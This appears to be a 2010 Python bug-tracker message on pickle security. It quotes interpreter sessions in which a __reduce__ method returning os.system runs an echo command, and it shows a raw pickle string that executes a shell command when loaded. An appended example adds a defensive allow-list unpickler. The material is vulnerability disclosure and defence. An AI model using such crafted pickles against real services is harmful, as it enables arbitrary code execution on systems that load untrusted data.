Message112475
M.-A. Lemburg wrote:
> Jean-Paul Calderone wrote:
>>
>> Jean-Paul Calderone <exarkun@twistedmatrix.com> added the comment:
>>
>> For example:
>>
>> exarkun@boson:~$ python
>> Python 2.6.4 (r264:75706, Dec 7 2009, 18:45:15)
>> [GCC 4.4.1] on linux2
>> Type "help", "copyright", "credits" or "license" for more information.
>> >>> class x(object):
>> ...     def __reduce__(self):
>> ...         import os
>> ...         return os.system, ('echo "Hello from sploitland"',)
>> ...
>> >>> import pickle
>> >>> pickle.loads(pickle.dumps(x()))
>> Hello from sploitland
>> 0
>
> But here you are not transferring malicious code in the pickle
> string, you are just triggering the execution of such code that
> you already have (and are in control of).
>
> Without the definition of class x on the receiving side, there
> would be no exploit.
>
> By adding support for pickling code objects, you'd make it possible
> to place the definition of class x into the pickle string and
> you would no longer be in control of that code.
Hmm, I just tried the code and it seems that you're right:
The pickle string does not contain a reference to class x,
but only the name of the function to call. Wow, that's a huge
hole in Python's pickle system...
>>> class C(object):
...     def __reduce__(self):
...         import os
...         return os.system, ('echo "Bingo"',)
...
>>> import pickle
>>> pickle.dumps(C())
'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> C = None
>>> s = 'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> pickle.loads(s)
Bingo
0
Date | User | Action | Args
2010-08-02 14:11:31 | lemburg | set | recipients: + lemburg, exarkun, belopolsky, pitrou, alexandre.vassalotti
2010-08-02 14:11:29 | lemburg | link | issue9276 messages
2010-08-02 14:11:29 | lemburg | create |
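
The observation in this message, that the pickle string holds only the name of the callable (posix system) followed by a REDUCE opcode, can be confirmed without loading the string. The following is an added example, not code from this thread or from CPython: it is written for Python 3, it lists the globals a pickle names with pickletools and refuses them in a find_class override, and ALLOWED_GLOBALS, referenced_globals, calls_callable, RestrictedUnpickler, safe_loads and try_load are names made up for the illustration.

```python
import io
import pickle
import pickletools

# The protocol-0 pickle string from the message above, as Python 3 bytes.
PAGE_PICKLE = b'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'

# Constructed allow-list for this example: the only globals a pickle may name.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}


def referenced_globals(data):
    """List (module, name) pairs from GLOBAL opcodes (protocols 0-3), without loading."""
    found = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # pickletools reports the argument as "module name".
            found.append(tuple(arg.split(" ", 1)))
    return found


def calls_callable(data):
    """True if the stream contains REDUCE, i.e. asks the loader to call something."""
    return any(op.name == "REDUCE" for op, _arg, _pos in pickletools.genops(data))


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allow-listed globals (any protocol)."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(
                "global %s.%s is not allowed" % (module, name))
        return super().find_class(module, name)


def safe_loads(data):
    """Load a pickle through RestrictedUnpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_load(data):
    """Return ('ok', value) or ('blocked', reason); a refused global is never resolved."""
    try:
        return "ok", safe_loads(data)
    except pickle.UnpicklingError as exc:
        return "blocked", str(exc)
```

The static scan only reads the protocol 0-3 GLOBAL opcode; the find_class override is what enforces the allow-list, and it applies to every protocol.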